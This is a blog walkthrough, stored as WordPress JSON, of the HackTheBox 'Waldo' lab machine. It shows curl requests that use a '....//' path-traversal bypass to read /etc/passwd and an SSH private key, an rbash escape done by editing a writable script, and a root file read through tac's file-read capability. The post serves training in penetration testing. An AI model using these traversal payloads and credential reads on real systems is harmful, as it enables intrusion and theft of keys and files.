{"id":265,"date":"2020-06-07T11:03:14","date_gmt":"2020-06-07T11:03:14","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=265"},"modified":"2020-06-07T11:08:59","modified_gmt":"2020-06-07T11:08:59","slug":"waldo-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/waldo-hackthebox-walkthrough\/","title":{"rendered":"Waldo: Hackthebox walkthrough"},"content":{"rendered":"\n

Waldo is a medium linux<\/strong> machine from hackthebox. The initial foothold on the box is based on understanding a bunch of .php files that leads to sensitive file read such as the ssh private key. Once inside the box, linux enumeration depicts that there is a docker<\/strong> running. The user of the docker needs to be guessed to get successful entry to docker. Inside docker, there is rbash which restricts most of the commands. After successful escaping of rbash, enumeration scripts can be easily run that outputs user having some capabilities<\/strong>. The capabilities assigned can be used to do privileged file reads!!<\/p>\n\n\n\n

It was really a fun box to pwn! So, with all that said, lets get started!!<\/p>\n\n\n\n

Starting with nmap scan, there were only 2 open ports and a filtered port 8888!<\/p>\n\n\n\n

# nmap -sC -sV -oA waldo.nmap 10.10.10.87<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
As always, I checked the contents of http:\/\/10.10.10.87<\/a>, and a weird page landed. <\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Clicking through buttons, It was easy to recognize that one could add and delete lists.<\/p>\n\n\n\n
Also list1, list2 <\/strong>are clickable. And one can add data inside it.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
On Viewing the page source, I found this<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Path to getting the user<\/h2>\n\n\n\n
Lists.js<\/strong> was executing as a part of script.<\/p>\n\n\n\n
Since the file was readable, I listed its contents<\/p>\n\n\n\n
function writeList(listNum, data){ \n\tvar xhttp = new XMLHttpRequest();\n\txhttp.open(\"POST\",\"fileWrite.php\",false);\n\txhttp.setRequestHeader(\"Content-type\", \"application\/x-www-form-urlencoded\");\n\txhttp.send('listnum=' + listNum + '&data=' + data);\n\tif (xhttp.readyState === 4 && xhttp.status === 200) {\n\t\treturn xhttp.responseText;\n\t}else{\n\t}\n}\n\n\nfunction deleteList(listNum){ \n\tvar xhttp = new XMLHttpRequest();\n\txhttp.open(\"POST\",\"fileDelete.php\",false);\n\txhttp.setRequestHeader(\"Content-type\", \"application\/x-www-form-urlencoded\");\n\txhttp.send('listnum=' + listNum);\n\tif (xhttp.readyState === 4 && xhttp.status === 200) {\n\t\tlistLists();\n\t\treturn xhttp.responseText;\n\t}else{\n\t}\n}\n\n\nfunction addList(){\n\tfor (var i=1; true; i++){\n\t\tif(document.getElementById(\"list\" + i) === null){\n\t\t\twriteList(\"\" + i, \"\");\n\t\t\tlistLists();\n\t\t\tbreak;\n\t\t}\n\t}\n}\n\n\nfunction listLists(){\n\tdocument.getElementById(\"main\").innerHTML = '<ul id=\"listOfLists\"><\/ul>';\n\tvar result = JSON.parse(readDir(\".\/.list\/\"));\n\tif(result.length > 2){\n\t\tfor(var i = 2; i < result.length; i++){\n\t\t\tdocument.getElementById(\"listOfLists\").innerHTML += \"<li><p style='cursor:pointer' id='\" + result[i] \n\t\t\t\t+ \"' onclick='printList(\\\".\/.list\/\" + result[i] + \"\\\")'>\" + result[i] \n\t\t\t\t+ \"<\/p><button onclick=deleteList('\" + result[i].substring(4) + \"')>Delete<\/button><\/li>\";\n\t\t}\n\t}else{\n\t\tconsole.log(\"invalid response\");\n\t}\n\tdocument.getElementById(\"main\").innerHTML += '<button onclick=addList()>Add List<\/button>';\n}\n\n\nfunction appendListItem(){\n\tfor(var i =1; true; i++){\n\t\tif(document.getElementById(\"listItem\"+i) === null){\n\t\t\tdocument.getElementById(\"list\").innerHTML +=  \"<li><p style='cursor:text' id='listItem\" + i \n\t\t\t\t+ \"'onkeydown='return keyDownHandler(event, this)' onblur=saveList() contenteditable='true'>New Item<\/p><button onclick=deleteListItem(this) name='\" \n\t\t\t\t+ i + \"'>Delete<\/button><\/li>\";\n\t\t\tbreak;\n\t\t}\n\t}\n}\n\n\nfunction deleteListItem(e){\n\tvar id = Number(e.getAttribute(\"name\"));\n\tvar listNum = document.getElementById(\"listName\").getAttribute(\"name\");\n\tvar json = JSON.parse(strList());\n\tif(json[id] !== undefined){\n\t\tfor(var i=id; true; i++){\n\t\t\tif(json[i+1] !== undefined){\n\t\t\t\tjson[i] = json[i+1]; \n\t\t\t}else{\n\t\t\t\tdelete json[i];\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\twriteList(listNum, JSON.stringify(json));\n\tprintList(\".\/.list\/list\"+listNum);\n}\n\n\nfunction strList(){\n\tvar tempJSON = {};\n\tfor(var i=1; true; i++){\n\t\tif(document.getElementById(\"listItem\"+i) !== null){\n\t\t\ttempJSON[i] = revertSpecial(document.getElementById(\"listItem\"+i).innerHTML);\n\t\t}else{\n\t\t\treturn JSON.stringify(tempJSON);\n\t\t}\n\t}\n}\n\n\nfunction keyDownHandler(event, e){\n\tif(event.code === \"Enter\"){\n\t\te.blur();\t\n\t\treturn false;\n\t}\n}\n\n\nfunction saveList(){\n\tvar jsonStr = strList();\n\tvar listNum = document.getElementById(\"listName\").getAttribute(\"name\");\n\treturn writeList(listNum, jsonStr);\n}\n\n\nfunction revertSpecial(inStr){\n\tinStr = inStr.replace(\/&nbsp;\/g, ' ');\n\tinStr = inStr.replace(\/&quot;\/g, '\\\\\"');\n\tinStr = inStr.replace(\/&num;\/g, '#');\n\tinStr = inStr.replace(\/&dollar;\/g, '$');\n\tinStr = inStr.replace(\/&percnt;\/g, '%');\n\tinStr = inStr.replace(\/&amp;\/g, '&');\n\tinStr = inStr.replace(\/&apos;\/g, \"\\\\'\");\n\tinStr = inStr.replace(\/&lpar;\/g, '(');\n\tinStr = inStr.replace(\/&rpar;\/g, ')');\n\tinStr = inStr.replace(\/&ast;\/g, '*');\n\tinStr = inStr.replace(\/&plus;\/g, '+');\n\tinStr = inStr.replace(\/&comma;\/g, ',');\n\tinStr = inStr.replace(\/&minus;\/g, '-');\n\tinStr = inStr.replace(\/&period;\/g, '.');\n\tinStr = inStr.replace(\/&colon;\/g, ':');\n\tinStr = inStr.replace(\/&sol;\/g, '\/');\n\tinStr = inStr.replace(\/&semi;\/g, ';');\n\tinStr = inStr.replace(\/&lt;\/g, '<');\n\tinStr = inStr.replace(\/&equals;\/g, '=');\n\tinStr = inStr.replace(\/&gt;\/g, '>');\n\tinStr = inStr.replace(\/&quest;\/g, '?');\n\tinStr = inStr.replace(\/&commat;\/g, '@');\n\tinStr = inStr.replace(\/&lsqb;\/g, '[');\n\tinStr = inStr.replace(\/&rsbp;\/g, ']');\n\tinStr = inStr.replace(\/&bsol;\/g, '\\\\\\\\');\n\tinStr = inStr.replace(\/&Hat;\/g, '^');\n\tinStr = inStr.replace(\/&lowbar;\/g, '_');\n\tinStr = inStr.replace(\/&grave;\/g, '`');\n\tinStr = inStr.replace(\/&lcub;\/g, '{');\n\tinStr = inStr.replace(\/&rcub;\/g, '}');\n\tinStr = inStr.replace(\/&verbar;\/g, '|');\n\tinStr = inStr.replace(\/\\\\\/g, '\\\\\\\\');\n\tinStr = inStr.replace(\/\"\/g, '\\\\\\\"')\n\treturn escape(inStr);\n}\n\n\nfunction readDir(path){ \n\tvar xhttp = new XMLHttpRequest();\n\txhttp.open(\"POST\",\"dirRead.php\",false);\n\txhttp.setRequestHeader(\"Content-type\", \"application\/x-www-form-urlencoded\");\n\txhttp.send('path=' + path);\n\tif (xhttp.readyState === 4 && xhttp.status === 200) {\n\t\treturn xhttp.responseText;\n\t}else{\n\t}\n}\n\n\nfunction readFile(file){ \n\tvar xhttp = new XMLHttpRequest();\n\txhttp.open(\"POST\",\"fileRead.php\",false);\n\txhttp.setRequestHeader(\"Content-type\", \"application\/x-www-form-urlencoded\");\n\txhttp.send('file=' + file);\n\tif (xhttp.readyState === 4 && xhttp.status === 200) {\n\t\treturn xhttp.responseText;\n\t}else{\n\t}\n}\n\n\nfunction printList(file){\n\tdocument.getElementById(\"main\").innerHTML = \"<h2 id=\\\"listName\\\" name='\" + file.substring(12) + \"'>\" + file.split(\"\/\")[2] + \"<\/h2>\";\n\tdocument.getElementById(\"main\").innerHTML += \"<ol id=list><\/ol>\";\n\tvar contents = JSON.parse(JSON.parse(readFile(file))['file']);\n\tfor(var i =1; true; i++){\n\t\tif(contents[i] === undefined){\n\t\t\tbreak;\n\t\t}\n\t\tdocument.getElementById(\"list\").innerHTML +=  \"<li> <p style='cursor:text' id='listItem\" + i \n\t\t\t+ \"'onkeydown='return keyDownHandler(event, this)' onblur=saveList() contenteditable='true'>\" \n\t\t\t+ contents[i] + \"<\/p><button onclick=deleteListItem(this) name='\" + i + \"'>Delete<\/button><\/li>\";\n\t}\n\tdocument.getElementById(\"main\").innerHTML += '<button onclick=appendListItem()>Add<\/button>';\n\tdocument.getElementById(\"main\").innerHTML += '<button onclick=listLists()>Back<\/button>';\n}\n\n\nfunction toggleHint() {\n\t\tvar e = document.getElementsByClassName('content-block');\n\t\tfor(var i = 0; i < e.length; i++){\n\t\t\tif(e[i].style.display == 'block' || e[i].style.display == '')\n\t\t\t\te[i].style.display ='none';\n\t\t\telse\n\t\t\t\te[i].style.display ='block';\n\t\t}\n\t\tsetTimeout(function(){\n\t\t\tvar e = document.getElementsByClassName('content-block');\n\t\t\tfor(var i = 0; i < e.length; i++){\n\t\t\t\tif(e[i].style.display == 'block' || e[i].style.display == '')\n\t\t\t\t\te[i].style.display ='none';\n\t\t\t\telse\n\t\t\t\t\te[i].style.display ='block';\n\t\t\t}\n\t\t}, 1000);\n}\n<\/code><\/pre>\n\n\n\n
Viewing at the various function, I saw a lot of filename being used such as dirRead.php, fileRead.php, fileWrite.php<\/strong>. Sounded interesting!!<\/p>\n\n\n\n
I quickly intercepted the request for adding the list and inserting data to the list.<\/p>\n\n\n\n
POST \/fileWrite.php HTTP\/1.1\nHost: 10.10.10.87\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:76.0) Gecko\/20100101 Firefox\/76.0\nAccept: *\/*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-type: application\/x-www-form-urlencoded\nContent-Length: 218\nOrigin: http:\/\/10.10.10.87\nConnection: close\nReferer: http:\/\/10.10.10.87\/list.html\n \nlistnum=1&data={\"1\":\"New%Item\",\"2\":\"New%20Item\",\"3\":\"New%20Item\"}<\/code><\/pre>\n\n\n\n
POST \/dirRead.php HTTP\/1.1\nHost: 10.10.10.87\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:76.0) Gecko\/20100101 Firefox\/76.0\nAccept: *\/*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-type: application\/x-www-form-urlencoded\nContent-Length: 13\nOrigin: http:\/\/10.10.10.87\nConnection: close\nReferer: http:\/\/10.10.10.87\/list.html\nCache-Control: max-age=0\n \npath=.\/.list\/<\/code><\/pre>\n\n\n\n
POST \/fileRead.php HTTP\/1.1\nHost: 10.10.10.87\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:76.0) Gecko\/20100101 Firefox\/76.0\nAccept: *\/*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-type: application\/x-www-form-urlencoded\nContent-Length: 18\nOrigin: http:\/\/10.10.10.87\nConnection: close\nReferer: http:\/\/10.10.10.87\/list.html\n \nfile=.\/.list\/list1<\/code><\/pre>\n\n\n\n
Looking at these requests, I found one thing common. All of them were taking some post parameter<\/strong>. So according to the requests, list was a directory and list1 was a file having contents in it. And with the help of fileRead.php<\/strong> one could easily read .\/.list\/list1<\/strong>. Cool!!<\/p>\n\n\n\n
First thing that came to my mind was directory traversal<\/strong> to read sensitive files. I tried around for a while, but something was going wrong!<\/p>\n\n\n\n
I realized that i could potential read the contents of fileRead.php so study what exactly its doing. And we knew that the path for fileRead.php will be same as list ( implied from from list.js ).<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Got the response in burp suite, but it was messed up. So i downloaded jq <\/strong>from apt repository. Jq is JSON processor that basically beautifies the json output making is more readable.<\/p>\n\n\n\n
 \u26a1 root@kali  ~\/Desktop\/htb\/waldo> apt install jq\n\n \u26a1 root@kali  ~\/Desktop\/htb\/waldo>  curl http:\/\/10.10.10.87\/fileRead.php -d \"file=.\/fileRead.php\" | jq -r .file # file is the object having the data\n\n<?php\nif($_SERVER['REQUEST_METHOD'] === \"POST\"){\n    $fileContent['file'] = false;\n    header('Content-Type: application\/json');\n    if(isset($_POST['file'])){\n   \t header('Content-Type: application\/json');\n   \t $_POST['file'] = str_replace( array(\"..\/\", \"..\\\"\"), \"\", $_POST['file']);\n   \t if(strpos($_POST['file'], \"user.txt\") === false){\n   \t\t $file = fopen(\"\/var\/www\/html\/\" . $_POST['file'], \"r\");\n   \t\t $fileContent['file'] = fread($file,filesize($_POST['file']));  \n   \t\t fclose();\n   \t }\n    }\n    echo json_encode($fileContent);\n}\n<\/code><\/pre>\n\n\n\n
After reading the code, I realized why I was unable to perform directory traversal. Its because the str_replace <\/span><\/strong>is replacing \u201c..\/\u201d<\/strong> with \u201c\u201d<\/strong>. But the loophole here is that str_replace does the replacement only one time it encounters \u201c..\/\u201d. Therefore if we write, \u201c\u2026.\/\/<\/strong>\u201d, it will replace one \u201c..\/\u201d to \u201c\u201d but will leave the other one forming as it is and this can potentially bypass the constraints.\u00a0<\/p>\n\n\n\n
I tried reading the contents of \/etc\/passwd with the above bypass and it worked!!<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
To get a good formatted result, I made a post request with curl.<\/p>\n\n\n\n
 # curl http:\/\/10.10.10.87\/fileRead.php -d \"file=....\/\/....\/\/....\/\/etc\/passwd\" | jq -r .file<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
With the result, I found out that nobody is the user present on the box with \/bin\/sh<\/strong> shell. Cool!<\/p>\n\n\n\n
That means that we could potentially grab user.txt as well.<\/p>\n\n\n\n
Changing -d in curl to \u2026.\/\/\u2026.\/\/\u2026.\/\/home\/nobody\/user.txt<\/strong> fetched the user.txt<\/strong>. Awesome! Without having a shell I was able to grab the user flag.\u00a0<\/p>\n\n\n\n
But what next??? I was still leading nowhere after getting the user flag.<\/p>\n\n\n\n
Then i remembered that similar to fileRead.php, there was also dirRead.php.<\/p>\n\n\n\n
I was able to grab the contents of dirRead.php<\/strong>, by doing all the same I did for fileRead.php. By using this functionality, I could list the different files present in the directories.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
# curl http:\/\/10.10.10.87\/fileRead.php -d \"file=.\/dirRead.php\" | jq -r .file<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
It was doing the same thing : replacing ..\/ to \u201c\u201d<\/strong>. Cool!!<\/p>\n\n\n\n
I made a post request to dirRead.php and added the post parameter as path with its value \u2026.\/\/\u2026.\/\/\u2026.\/\/home\/nobody<\/strong><\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
A response was obtained with .ssh present inside \/home\/nobody.<\/strong> Next I listed the contents of .ssh directory.<\/p>\n\n\n\n
With path = \u2026.\/\/\u2026.\/\/\u2026.\/\/home\/nobody\/.ssh<\/strong><\/p>\n\n\n\n
The result showed that the private key name couldnt be brute-forced. Here .monitor was the name of private key!!!<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Again with fileRead.php, I read the contents of .monitor and piped it to the file on local machine. Also changed the permissions of the file to 600.<\/p>\n\n\n\n
# curl http:\/\/10.10.10.87\/fileRead.php -d \"file=....\/\/....\/\/....\/\/home\/nobody\/.ssh\/.monitor\" | jq -r .file >id_rsa; chmod 600 id_rsa\n<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Nobody is now logged in!! Grab the user.txt if not done earlier.<\/p>\n\n\n\n
Pwning the root!!!<\/h2>\n\n\n\n
I downloaded linpeas.sh<\/a> on the waldo machine and enumerated!<\/p>\n\n\n\n
One interesting thing was having supervisord on the box and the other was, there was a docker <\/strong>running on the machine.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I tried to ssh using user- nobody, but had no luck. Then I did some guess work. The name of the ssh private key was .monitor <\/strong>and that was weird. So maybe it could have been the user of docker.<\/p>\n\n\n\n
 waldo:~$ cd .ssh\n waldo:~\/.ssh$ ssh -i .monitor monitor@172.17.0.1<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I was inside docker, but simple commands like cd too was restricted. That implies that I maybe in a rbash shell.\u00a0<\/p>\n\n\n\n
We can also check that with the following command.<\/p>\n\n\n\n
#echo $SHELL
 \/bin\/rbash<\/pre>\n\n\n\n
\"\"\/
Commands that were working<\/figcaption><\/figure>\n\n\n\n
Then i ran echo $PATH<\/strong> to see the path for the user. On listing the contents of various paths, I found logMonitor having the permissions of rwx. That was exactly. what i wanted. Now I can modify this file to escape the rbash restrictions<\/strong>.<\/p>\n\n\n\n
I opened app-dev\/logMonitor with red.<\/strong>\u00a0<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
red is an utility used to create, display, modify and otherwise manipulate text files. Its a line-oriented text editor. Here, r stands for restricted making it restricted ed.<\/p>\n\n\n\n
w is used to write contents to the file 
 q quits from the red editor
 \/bin\/bash will be appended to the end of logMonitor<\/b> file<\/p>\n\n\n\n
When logMonitor is now executed, \/bin\/bash gets executed that eventually escapes the rbash.<\/p>\n\n\n\n
Now commands like cd started to work<\/strong>, but there was still a problem. The $PATH didnt got updated and as a result, commands like wget, curl, nc (that were present on base machine) were not working.<\/p>\n\n\n\n
So run echo $PATH on attacking machine. <\/p>\n\n\n\n
Paste that output into command on the docker<\/p>\n\n\n\n
# export PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin<\/pre>\n\n\n\n
This will update the path of the current user leading to working of every binary present on the docker.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So now that we are again in a normal shell, lets grab linpeas.sh from attacking machine.<\/p>\n\n\n\n
In the output, I found a section of capabilities and \/usr\/bin\/tac<\/strong> had cap_dac_read_search+ei<\/strong> capabilities.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Upon searching the internet for capabilities<\/a>, I found this:<\/p>\n\n\n\n
Linux capabilities<\/span><\/strong> provide a subset of the available root privileges to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. In our case, CAP_DAC_READ_SEARCH<\/strong> <\/span>bypass file read permission checks and directory read and execute permission checks.<\/p>\n\n\n\n
That implies that monitor <\/strong>can read any file on the box using the tac command. <\/p>\n\n\n\n
tac<\/em> command in Linux<\/em> is used to concatenate and print files in reverse. his command writes each FILE to standard output, the last line first.\u00a0<\/p>\n\n\n\n
Also I found a link to gtfobins<\/strong><\/a>, where tac can be exploited. <\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
# \/usr\/bin\/tac \/root\/root.txt<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Thats all for the blog post!! Thanks for reading. For more content on infosec visit here<\/a> <\/p>\n\n\n\n
Until then, happy hunting!!<\/p>\n\n\n","protected":false},"excerpt":{"rendered":"
Waldo is a medium linux machine from hackthebox. The initial foothold on the box is based on understanding a bunch of .php files that leads to sensitive file read such as the ssh private key. Once inside the box, linux enumeration depicts that there is a docker running. The user of the docker needs to […]<\/p>\n","protected":false},"author":1,"featured_media":272,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2],"tags":[128,124,67,133,123,125,70,26,54,122,127,126,132,130,131,129,121],"class_list":["post-265","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","tag-capabilities","tag-diread","tag-docker","tag-escape-rbash","tag-fileread","tag-filewrite","tag-gtfobins","tag-hackthebox","tag-htb","tag-javascript","tag-linpeas-sh","tag-php","tag-rbash","tag-red","tag-red-editor","tag-tac","tag-waldo-htb","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/265"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=265"}],"version-history":[{"count":9,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/265\/revisions"}],"predecessor-version":[{"id":276,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/265\/revisions\/276"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/272"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}